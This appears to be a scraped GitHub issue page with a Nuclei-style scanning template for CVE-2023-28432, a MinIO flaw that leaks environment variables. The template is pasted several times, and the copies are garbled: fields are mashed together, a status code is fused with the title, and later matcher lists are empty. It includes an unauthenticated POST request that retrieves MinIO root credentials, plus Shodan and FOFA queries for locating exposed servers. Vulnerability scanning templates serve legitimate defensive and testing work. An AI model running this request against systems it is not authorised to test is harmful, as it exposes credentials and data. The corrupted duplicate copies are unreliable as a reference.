You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
info:
name: MinIO Cluster Deployment - Information Disclosure
author: Mr-xn
severity: high
description: |
MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
reference:
- GHSA-6xvq-wj2x-3h3q
- https://github.com/minio/minio/pull/16853/files
- golang/vulndb#1667
- https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
- https://nvd.nist.gov/vuln/detail/CVE-2023-28432
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-28432
cwe-id: CWE-200,NVD-CWE-noinfo
epss-score: 0.14384
epss-percentile: 0.95092
cpe: cpe:2.3:a:minio:minio::::::::
metadata:
verified: true
max-request: 1
vendor: minio
product: minio
shodan-query: title:"Minio Console"
fofa-query: app="Minio"
tags: cve,cve2023,minio,console,exposure,kev
http:
raw:
|+
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
type: word
part: body
words:
'"MINIO_ROOT_PASSWORD":'
'"MINIO_ROOT_USER":'
'"MinioEnv":'
condition: or
type: word
part: header
words:
'text/plain'
type: status
status:
200 - Information Disclosure
author: Mr-xn
severity: high
description: |
MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
reference:
id: CVE-2023-28432
info:
name: id: CVE-2023-28432
info:
name: MinIO Cluster Deployment - Information Disclosure
author: Mr-xn
severity: high
description: |
MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
reference:
- GHSA-6xvq-wj2x-3h3q
- https://github.com/minio/minio/pull/16853/files
- golang/vulndb#1667
- https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
- https://nvd.nist.gov/vuln/detail/CVE-2023-28432
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-28432
cwe-id: CWE-200,NVD-CWE-noinfo
epss-score: 0.14384
epss-percentile: 0.95092
cpe: cpe:2.3:a:minio:minio::::::::
metadata:
verified: true
max-request: 1
vendor: minio
product: minio
shodan-query: title:"Minio Console"
fofa-query: app="Minio"
tags: cve,cve2023,minio,console,exposure,kev
http:
raw:
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
type: word
part: body
words:
condition: or
type: word
part: header
words:
type: status
status:
author: Mr-xn
severity: high
description: |
MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
reference:
GHSA-6xvq-wj2x-3h3q
https://github.com/minio/minio/pull/16853/files
x/vulndb: potential Go vuln in github.com/minio/minio: CVE-2023-28432 golang/vulndb#1667
https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
https://nvd.nist.gov/vuln/detail/CVE-2023-28432
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-28432
cwe-id: CWE-200,NVD-CWE-noinfo
epss-score: 0.14384
epss-percentile: 0.95092
cpe: cpe:2.3:a:minio:minio::::::::
metadata:
verified: true
max-request: 1
vendor: minio
product: minio
shodan-query: title:"Minio Console"
fofa-query: app="Minio"
tags: cve,cve2023,minio,console,exposure,kev
http:
raw:
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
type: word
part: body
words:
condition: or
type: word
part: header
words:
type: status
status:
The text was updated successfully, but these errors were encountered: